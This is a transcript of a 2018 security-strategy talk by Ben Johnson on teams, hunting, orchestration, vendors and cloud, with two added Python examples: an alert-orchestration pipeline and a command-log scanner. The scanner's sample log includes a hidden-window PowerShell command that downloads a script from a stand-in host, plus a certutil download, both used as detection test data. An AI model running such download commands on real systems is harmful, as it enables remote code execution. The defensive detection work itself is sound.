Ben Johnson | Co-Founder & CTO
March 7th, 2018
Practical Cyber
Lessons from 500,000 Miles of Security Evangelism
@chicagoben | @obsidiansec
Background Check // Ben Johnson
Co-Founder and CTO, Obsidian
Co-Founder and Former CTO, Carbon Black
Former CNO/Cyber // NSA, CIA, DoD
AGENDA
Introduction & Background
Looking Inward
People, Processes, Technology
Looking Outward
Vendors, Resellers, Analysts
Cloud Call-Out
Wrap-Up
Today’s Goal?
TO SPARK CONTEMPLATION
(and give you something to remember!)
https://www.slideshare.net/chicagoben/
Cyber Scoreboard
How are we doing?
Plenty of Challenges
SKILLS GAP
DEPLOY-AND-DECAY
= LACK OF CYBER SELF-ESTEEM
HUGE DATA
ATTACKER SUCCESSES
Looking Inward
People, Processes, & Technology
People - Team
“Individuals disappear on high performing teams.” - NASA
People - Recruiting & Retaining
“Hire for Passion, Train for Skill, Coach for Performance”
“Passion, Capacity, Humility”
Considerations:
• Security Teams Need a Leader…and a Shield
• Don’t hire just based on tool experience!!
  “Capacity” ... “Hire a bartender”
• Mentoring & Growth
  Creative perks? New data? Coding to APIs?
• Talent Density and Solving Challenging Problems
https://venturebeat.com/2017/10/21/how-to-build-your-dynasty-hire-for-passion-train-for-skill-coach-for-performance/
People - Too Many Distractions
People - Essentialism
“It is about making the wisest possible investment of your time and energy in order to operate at our highest point of contribution by doing only what is essential.”
– Greg McKeown, Author of Essentialism
People - Journey vs. Destination
Security teams focus where they have autonomy.
They get comfortable in this never-ending journey vs. driving toward new destinations.
People - Culture
“Culture eats strategy for breakfast” - P. Drucker
Processes - Extend IT an Olive Branch
Processes - Other Budgets
Processes - Adversarial & Threat Modeling
Cybercriminals
• Broad-based and targeted
• Financially motivated
• Getting more sophisticated
Hacktivists
• Targeted and destructive
• Unpredictable motivations
• Generally less sophisticated
Nation-States
• Targeted and multi-stage
• Motivated by data collection
• Highly sophisticated with endless resources
Insiders
• Targeted and destructive
• Unpredictable motivations
• Sophistication varies
Processes - Hunting
▪ ALLOW FOR CREATIVITY. ALLOW HUNTERS TO ‘EXPLORE’
▪ LOOK FOR RISK. LOOK FOR THREATS.
▪ EXCHANGE INFORMATION QUICKLY
▪ LOOK ACROSS THE STACK – CONTEXT
▪ DON’T WAIT FOR MACHINES
▪ MAKE SURE THERE ARE LESSONS LEARNED FROM EACH HUNT
Processes - Hunting Outcomes
▪ NOT ALWAYS MALWARE OR APT OR MALICIOUS ACTIVITY.
▪ WHERE TO HUNT?
▪ WHAT TO HUNT?
▪ WHERE ARE MY GAPS?
▪ WHERE ARE MY STRENGTHS?
▪ WHERE DO I NEED MORE CARE AND FEEDING?
Processes - Red + Blue = Purple
• Sit red team next to blue team!
• Once an attack or a technique works, have the blue team fix it (or update detection rules, etc.), then immediately try again to make sure it is now prevented or detected
• Drive Immediate Improvements
Processes: Engineers vs Analysts
Processes: Too Focused On Market Segments
Layers-Fu: Focus on Capabilities
Hunting & Collaborating
Integration & Automation
Hardening & Prevention
Retrospection
Behavior Detection
Attribute Detection
Remediation
Triage
Visibility
Layers-Fu: ROI of Time?
Hunting & Collaborating
Integration & Automation
Hardening & Prevention
Retrospection
Behavior Detection
Attribute Detection
Remediation
Triage
Visibility
Technology: Prioritize Collection
Timeline: Compromised (attacker present) → Breach Discovered (attacker identified) → Recovered (attacker expelled)
DWELL TIME: the interval between compromise and breach discovery
Proactively collecting data (recording continuously, before the breach is discovered) is automated, efficient & conclusive.
Reactively collecting data (after the breach is discovered) is time consuming, expensive & incomplete.
You know what questions you’ll have… Make sure you can answer them!
Set up the video camera before the robbery.
Move Fast, Don’t Wait on Technology!
Technology: Visibility & Context
Scanning
Continuous Recording
Continuous Recording + Intelligence
Continuous Recording + Intelligence + Prevalence
Continuous Recording + Intelligence + Prevalence + Relationships
Focus Your Humans Where They Should Focus!
Alert where it makes sense!
Technology: Visible, Surveyed Environment
Nodes are processes & domains
Clustered by affinity
Technology: Integration & Automation
“JOIN, or DIE” becomes “AUTOMATE, or DIE”
Technology: Orchestration
Alert Generated
→ Validate, Correlate, and Enhance (Threat Intelligence; Device History; User Profile & Behaviors)
→ Alert Enriched
→ Remediation Actions (Block IPs; Kill Process, Preserve Evidence; Reset Credentials)
Technology: Orchestration Case Study
Pre-Orchestration:
• 2 Security Engineers
• 20 alerts a day
• Manually processed 5 alerts (25%)
• Data aggregation ~2 hours
• Time to resolution ~7 days
Post-Orchestration:
• 2 Security Engineers
• 200 alerts a day
• Automatically process 100% of alerts
• Data aggregation ~10 mins
• Time to resolution is <1hr
“Orchestration allowed us to add additional pieces to the stack to cover more gaps without an increase in headcount. Today it is easier to install new security technology than hire people to run it; therefore, orchestration alleviates lack of available security talent.”
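The orchestration flow on the previous slide (alert generated, then validated, correlated and enhanced with threat intelligence, device history and user behaviour, then mapped to remediation actions) and this case study's claim of processing every alert automatically, as an added Python example that is not part of the slides and not code from Obsidian or Carbon Black. The threat-intel feed, device history, user profiles, risk thresholds and the alerts themselves are constructed sample data and assumptions for illustration.

```python
"""Minimal alert-orchestration pipeline (added example, not from the slides).
Flow: Alert Generated -> Validate, Correlate, Enhance -> Alert Enriched -> Remediation Actions.
All feeds, hosts, users, thresholds and alerts below are constructed sample data."""
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List

# Constructed threat-intel feed: indicator -> confidence (0..1). Addresses are TEST-NET ranges.
THREAT_INTEL = {"203.0.113.45": 0.95, "198.51.100.7": 0.40}

# Constructed device history: host -> number of alerts in the last 7 days.
DEVICE_HISTORY = {"ws-0417": 3, "ws-0902": 0}

# Constructed user profiles: admin flag and usual working hours (start, end), 24h clock.
USER_PROFILE = {
    "alice": {"admin": False, "hours": (8, 18)},
    "svc-backup": {"admin": True, "hours": (1, 4)},
}


@dataclass
class Alert:
    host: str
    user: str
    process: str
    remote_ip: str
    timestamp: datetime
    # Fields filled in by enrichment.
    intel_score: float = 0.0
    prior_alerts: int = 0
    off_hours: bool = False
    privileged: bool = False
    risk: int = 0
    actions: List[str] = field(default_factory=list)


def validate(alert: Alert) -> bool:
    """Validate: drop alerts that cannot be acted on (missing fields or an internal peer)."""
    if not alert.host or not alert.remote_ip:
        return False
    return not alert.remote_ip.startswith(("10.", "192.168.", "127."))


def enrich(alert: Alert) -> Alert:
    """Correlate and enhance: intel score, device history, and user profile & behaviour."""
    alert.intel_score = THREAT_INTEL.get(alert.remote_ip, 0.0)
    alert.prior_alerts = DEVICE_HISTORY.get(alert.host, 0)
    profile = USER_PROFILE.get(alert.user, {"admin": False, "hours": (0, 24)})
    start, end = profile["hours"]
    alert.off_hours = not (start <= alert.timestamp.hour < end)
    alert.privileged = profile["admin"]
    # Additive risk: each independent signal contributes, high-confidence intel counts double.
    alert.risk = (
        (2 if alert.intel_score >= 0.8 else 1 if alert.intel_score > 0 else 0)
        + (1 if alert.prior_alerts >= 3 else 0)
        + (1 if alert.off_hours else 0)
        + (1 if alert.privileged else 0)
    )
    return alert


def decide_actions(alert: Alert) -> List[str]:
    """Map the enriched alert to the remediation actions named on the slide."""
    actions = []
    if alert.intel_score >= 0.8:
        actions.append(f"block_ip:{alert.remote_ip}")
    if alert.risk >= 3:
        actions.append(f"kill_process:{alert.host}:{alert.process}")
        actions.append(f"preserve_evidence:{alert.host}")
    if alert.privileged and alert.off_hours:
        actions.append(f"reset_credentials:{alert.user}")
    if not actions:
        actions.append("queue_for_analyst")  # low risk: leave it for a human
    alert.actions = actions
    return actions


def orchestrate(alerts: List[Alert]) -> Dict[str, List[str]]:
    """Run the pipeline; returns actions keyed by host for alerts that passed validation."""
    result: Dict[str, List[str]] = {}
    for a in alerts:
        if not validate(a):
            continue
        enrich(a)
        result[a.host] = decide_actions(a)
    return result


# Constructed sample alerts (one high-risk, one low-risk, one internal peer that fails validation).
SAMPLE_ALERTS = [
    Alert("ws-0417", "alice", "powershell.exe", "203.0.113.45", datetime(2018, 3, 7, 23, 15)),
    Alert("ws-0902", "svc-backup", "backup.exe", "198.51.100.7", datetime(2018, 3, 7, 2, 30)),
    Alert("ws-0777", "bob", "chrome.exe", "10.0.0.5", datetime(2018, 3, 7, 10, 0)),
]

if __name__ == "__main__":
    for host, acts in orchestrate(SAMPLE_ALERTS).items():
        print(host, acts)
```

The decision rules are deliberately conservative: high-confidence intel alone justifies a network block, but killing a process and preserving evidence needs several independent signals, and a credential reset is reserved for a privileged account acting outside its normal hours. Everything that does not clear a threshold is queued for an analyst rather than dropped, which is the "focus your humans where they should focus" point made earlier in the deck.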
Technology: Get Creative! (Open Source?)
Looking Inward: Quick Wins
• Whitelist domains (top 10k?)
• Disable Java & Flash!!
  • Or Patch (Java => 70% of alerts disappeared overnight)
• Restrict PowerShell to particular times of day!
• Disable/Expire Admin Accounts Until You Need Them
• Log every command line for common utilities
• Can you “lock down” a particular division, group, etc?
• Give your HVTs/VIPs iPads!
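Two of these quick wins, restricting PowerShell to particular times of day and checking outbound domains against an allowlist, applied to the command-line log that the "log every command line" item produces, as an added Python example that is not from the slides. The log line format, the 08:00 to 18:00 PowerShell window, the tiny allowlist standing in for a top-10k list, and the log lines themselves are constructed assumptions for illustration.

```python
"""Check two quick wins over a command-line log (added example, not from the slides):
PowerShell use outside an allowed window, and URLs pointing at non-allowlisted domains.
Log format, policy window, allowlist and sample log lines are constructed assumptions."""
import re
from datetime import datetime, time
from typing import Dict, List, Tuple

# Assumed log line format: ISO timestamp, host, user, image path, then the raw command line.
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<user>\S+) (?P<image>\S+) (?P<cmd>.*)$")

# Policy assumptions: PowerShell allowed 08:00-18:00 only; small stand-in for a top-10k allowlist.
PS_WINDOW = (time(8, 0), time(18, 0))
ALLOWED_DOMAINS = {"microsoft.com", "windowsupdate.com", "example.com"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def parse_line(line: str) -> Dict[str, object]:
    """Split one log line into fields; the timestamp becomes a datetime."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ev: Dict[str, object] = m.groupdict()
    ev["ts"] = datetime.fromisoformat(str(ev["ts"]))
    return ev


def registrable(host: str) -> str:
    """Crude eTLD+1: the last two labels, which is enough for the sample allowlist."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def check_event(ev: Dict[str, object]) -> List[str]:
    """Apply both rules to one parsed event and return human-readable findings."""
    findings: List[str] = []
    image = str(ev["image"]).lower()
    who = f"{ev['user']}@{ev['host']}"
    if image.endswith(("powershell.exe", "pwsh.exe")):
        t = ev["ts"].time()  # type: ignore[union-attr]
        if not (PS_WINDOW[0] <= t < PS_WINDOW[1]):
            findings.append(f"powershell outside window {PS_WINDOW[0]}-{PS_WINDOW[1]}: {who}")
    for host in URL_RE.findall(str(ev["cmd"])):
        if registrable(host) not in ALLOWED_DOMAINS:
            findings.append(f"non-allowlisted domain {host}: {who}")
    return findings


def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Scan a whole log; returns (timestamp, finding) pairs in log order."""
    out: List[Tuple[str, str]] = []
    for line in lines:
        ev = parse_line(line)
        for f in check_event(ev):
            out.append((ev["ts"].isoformat(), f))  # type: ignore[union-attr]
    return out


# Constructed sample log: in-window script, off-hours download from an unknown domain,
# a certutil fetch from an allowlisted domain, and a benign cmd.exe invocation.
SAMPLE_LOG = [
    r"2018-03-07T09:12:01 ws-0417 alice C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -File C:\scripts\inventory.ps1",
    r"2018-03-07T23:41:10 ws-0417 alice C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -c Invoke-WebRequest http://cdn.evil-example.net/update.ps1",
    r"2018-03-07T10:05:33 ws-0902 bob C:\Windows\System32\certutil.exe certutil.exe -urlcache -f https://download.microsoft.com/tool.exe tool.exe",
    r"2018-03-07T11:00:00 ws-0902 bob C:\Windows\System32\cmd.exe cmd.exe /c dir",
]

if __name__ == "__main__":
    for ts, finding in scan_log(SAMPLE_LOG):
        print(ts, finding)
```

Only the second line trips the rules, and it trips both: PowerShell at 23:41 is outside the window, and the URL it fetches resolves to a domain that is not on the allowlist. The in-window PowerShell script and the certutil download from an allowlisted domain produce nothing, which is the point of the time-of-day restriction: it does not argue about what PowerShell is for, it just makes off-hours use stand out.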
Looking Outward
Vendors, Resellers, & Analysts
Security Industry != Security Community
Proliferation
Consolidation
Security Industry != Security Community
Vendors: Competing Priorities & Incentives
• Big Guys vs. Small Guys
• Terminology War; Press Coverage
• Hard to Measure Effectiveness
• Don’t fall for ‘competitive traps’
• YOUR PROBLEMS vs. product features
• Force interoperability/integration
• Partner w/ Early Stage Companies: best time to capture innovation and value
Resellers: Competing Priorities & Incentives
• Margins & Relationships
• Comfortable or Easy
• Large Packages vs. Niche Deals
• Verify that solutions match needs
• Ask for new or holistic approaches
• Get personal with resellers
Analysts: Competing Priorities & Incentives
• Pay to Play
• Scoring Based on Discussions
• Gamed / Sponsored Evaluations
• Not Operators
• Understand the ‘why’ behind scoring
• Ask which non-customer they like
• Blogs vs. Reports
Cloud Call Out
(Do you understand the risks?)
Race to the Cloud!
Lots of benefits of cloud adoption … we aren’t really here for that.
Cloud Security Responsibility
Cloud Service Provider: responsible for security OF the cloud
Customer: responsible for security IN the cloud
Cloud Security Responsibility
Hackers want this!
Wrapping Up
(Take-Aways and more)
Take-Aways: Looking Inward
• People
  Hire for passion, train for skill, coach for performance
  Focus on ROI of Time
• Processes
  Approach as an engineering problem
  Work with IT
  Concentrate on capabilities
• Technology
  Integrate, Automate, and Orchestrate
  Blend Open Source & Commercial
  Focus on how technology enhances humans
Take-Aways: Looking Outward
• Interacting with Vendors
  Don’t fall for competitive traps
  Partner w/ Early Stage Companies
• Interacting with Resellers
  Verify that solutions match needs
  Get personal
• Interacting with Analysts
  Understand the ‘why’
  Utilize their relationships for introductions
Take-Aways: Cloud Call-Out
Understand where, how, and why you are using cloud.
Understand who is responsible.
Providers need to do more. They could reduce users shooting themselves in the foot, improve default security levels, and better show surface area.
(Please encourage them to do more!)
The rest is on you:
(Awareness, Auditing, Adaptation, Automation)!
(and don’t forget hygiene.)
COMPROMISE IS INEVITABLE
Attacker only has to be successful once, but defender has to stop 100% of attacks.
Once the attacker is in your environment, they should have to be 100% perfect.
What About Top 5?
• Approach Security (Risk Management) as an Engineering Problem
• Fix “Provision-and-Forget” and “Deploy-and-Decay”
• Reduce Entropy, Reduce Risk (I.T. is your best friend)
• Treat Your Users as Smart (Enable Your National Guard)
• Make it Fun
What’s Obsidian?
(Other than a start-up in SoCal)
Ben Johnson, CTO
ben@obsidiansecurity.com
THANK YOU!
https://www.slideshare.net/chicagoben/

Weitere ähnliche Inhalte

Ähnlich wie Focus Your Humans Where They Should Focus

Seeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First WorldSeeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First WorldBen Johnson
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
Bridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudBridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudInside Analysis
 
Surviving Your Tech Stack
Surviving Your Tech StackSurviving Your Tech Stack
Surviving Your Tech StackFITC
 
DevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable ProductsDevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable ProductsBen Hall
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!Steven Carlson
 
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation ProjectsAmazon Web Services
 
Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)Michael Adcock
 
Acceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditableAcceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditableAlban Gérôme
 
What Managers Need to Know about Data Science
What Managers Need to Know about Data ScienceWhat Managers Need to Know about Data Science
What Managers Need to Know about Data ScienceAnnie Flippo
 
Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021Rachel Harpley
 
Data and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical itData and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical itHyoun Park
 
(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0Amazon Web Services
 
Transforming the CSO Role to Business Enabler
Transforming the CSO Role to Business EnablerTransforming the CSO Role to Business Enabler
Transforming the CSO Role to Business EnablerCloudPassage
 
Agile Data Warehousing
Agile Data WarehousingAgile Data Warehousing
Agile Data WarehousingDavide Mauri
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtTechWell
 
The business case for contributing code
The business case for contributing codeThe business case for contributing code
The business case for contributing codeZivtech, LLC
 

Ähnlich wie Focus Your Humans Where They Should Focus (20)

Lean Hunting
Lean HuntingLean Hunting
Lean Hunting
 
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First WorldSeeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First World
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
 
Bridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudBridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the Cloud
 
Surviving Your Tech Stack
Surviving Your Tech StackSurviving Your Tech Stack
Surviving Your Tech Stack
 
DevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable ProductsDevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable Products
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!
 
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
 
Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)
 
Acceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditableAcceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditable
 
A6 big data_in_the_cloud
A6 big data_in_the_cloudA6 big data_in_the_cloud
A6 big data_in_the_cloud
 
What Managers Need to Know about Data Science
What Managers Need to Know about Data ScienceWhat Managers Need to Know about Data Science
What Managers Need to Know about Data Science
 
Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021
 
Lean Analytics: How to get more out of your data science team
Lean Analytics: How to get more out of your data science teamLean Analytics: How to get more out of your data science team
Lean Analytics: How to get more out of your data science team
 
Data and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical itData and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical it
 
(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0
 
Transforming the CSO Role to Business Enabler
Transforming the CSO Role to Business EnablerTransforming the CSO Role to Business Enabler
Transforming the CSO Role to Business Enabler
 
Agile Data Warehousing
Agile Data WarehousingAgile Data Warehousing
Agile Data Warehousing
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical Debt
 
The business case for contributing code
The business case for contributing codeThe business case for contributing code
The business case for contributing code
 

Kürzlich hochgeladen

"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Kürzlich hochgeladen (20)

"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
